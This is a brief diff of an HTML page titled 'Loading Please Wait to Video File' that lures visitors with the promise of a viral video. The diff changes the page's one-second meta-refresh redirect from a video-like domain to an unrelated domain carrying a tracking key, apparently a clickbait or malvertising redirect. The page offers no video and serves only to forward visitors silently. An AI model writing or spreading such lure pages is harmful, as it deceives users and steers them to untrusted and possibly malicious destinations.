--- a/viral-video.html
+++ b/viral-video.html
@@ -2,7 +2,7 @@
 <html>
    <head>
       <title>Loading Please Wait to Video File..................</title>
-      <meta http-equiv = "refresh" content = "1; url = https://videa.cam/viral-video" />
+      <meta http-equiv = "refresh" content = "1; url = https://magistrateknock.com/r56nz8515w?key=05f6024742c0bb208e964ad36ead9c3d" />
    </head>
    <body>
       <center><p>Loading Please Wait to Video File..................</p></center>
